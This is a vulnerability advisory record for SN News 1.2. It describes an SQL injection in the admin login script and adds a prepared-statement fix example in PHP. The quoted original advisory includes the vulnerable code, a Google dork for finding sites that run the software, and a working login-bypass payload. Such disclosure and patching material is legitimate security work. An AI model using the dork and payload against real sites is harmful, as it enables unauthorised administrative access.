Vendor: SN News
By: Pr0T3cT10n
CVSS: 7,5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: SN News
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE: N/A
CPE: a:phpbrasil:sn_news
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2012

SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability

SN News version 1.2 is vulnerable to remote SQL injection in the /admin/logar.php file. The script copies the `login` and `senha` POST parameters into the $login and $senha variables and places them, without validation or escaping, inside the quoted string literals of the SQL query that checks the admin credentials. Input containing a single quote therefore ends the literal and is parsed as SQL, which lets an attacker change the query's logic and bypass the admin login screen.

Mitigation:

Validate user input and use prepared statements to prevent SQL injection attacks.
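
One way to apply this mitigation to the login check in /admin/logar.php, as an added example that is not SN News code or part of the advisory. Assumptions: PDO with an in-memory SQLite database stands in for the application's MySQL connection, the function names and the 255-byte length limit are hypothetical, and the admin row is constructed test data.

```php
<?php
// Added example: prepared-statement version of the logar.php credential check.
// Assumptions: in-memory SQLite replaces the real MySQL connection; function
// names, the 255-byte limit and the admin row are constructed for this demo.
declare(strict_types=1);

function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE news_adm (login TEXT, senha TEXT)');
    $pdo->exec("INSERT INTO news_adm VALUES ('admin', 'constructed-secret')");
    return $pdo;
}

function admin_login_ok(PDO $pdo, $login, $senha): bool
{
    // $_POST values can be arrays; accept only non-empty, bounded strings.
    foreach ([$login, $senha] as $value) {
        if (!is_string($value) || $value === '' || strlen($value) > 255) {
            return false;
        }
    }
    // Placeholders keep the values out of the SQL text, so a quote in the
    // input is compared as data instead of being parsed as SQL.
    $stmt = $pdo->prepare(
        'SELECT 1 FROM news_adm WHERE login = :login AND senha = :senha'
    );
    $stmt->execute([':login' => $login, ':senha' => $senha]);
    return $stmt->fetchColumn() !== false;
}

$pdo = open_demo_db();
$cases = [
    'valid credentials'       => ['admin', 'constructed-secret'],
    "advisory's PoC input"    => ["' or '1'='1", "' or '1'='1"],
    'array instead of string' => [['x'], 'constructed-secret'],
];
foreach ($cases as $label => [$login, $senha]) {
    $result = admin_login_ok($pdo, $login, $senha) ? 'accepted' : 'rejected';
    printf("%-24s => %s\n", $label, $result);
}
```

In the application, a check like this would take the place of lines 4-8 of the vulnerable code, with `session_regenerate_id(true)` called before `$_SESSION["admin"]` is set. The table still compares passwords in plaintext, as the original query does; storing hashes is a separate change.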

Exploit-DB raw data:

##############################################################################
## SN News <= 1.2 (/admin/loger.php) Admin Bypass Remote SQL Injection Vulnerability
## Google Dork: "snews/visualiza.php?id="
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Date: 06/06/2012
## Version: 1.2
## Software Link: http://phpbrasil.com/script/JHnpFRmSBqlf/sn-news
## ISRAEL
##############################################################################
##          Author will not be responsible for any damage.
##############################################################################
## Vulnerable Code - /admin/logar.php [4-15]:
4.$login = $_POST["login"];
5.$senha = $_POST["senha"];
6.$sql   = "select * from news_adm where login='$login' AND senha='$senha'";
7.$query = mysql_query($sql);
8.$nr    = mysql_num_rows($query);
9.if($nr>0){
10.$_SESSION["admin"] = "on";
11.echo "<script>
12.location.href='../'
13.</script>
14.";
15.}
## NOTE:
## As you can see, there is no validation or filtering of the variables $login and $senha.
## See line 6: you can inject an SQL query by using the $login and $senha variables.
## SQL Injection PoC:
## http://127.0.0.1/sn_news/admin/login.htm
## Login: ' or '1'='1
## Senha: ' or '1'='1
## This injection will bypass the admin login screen.
##############################################################################
# Cya :)
# 0x31337.net
##############################################################################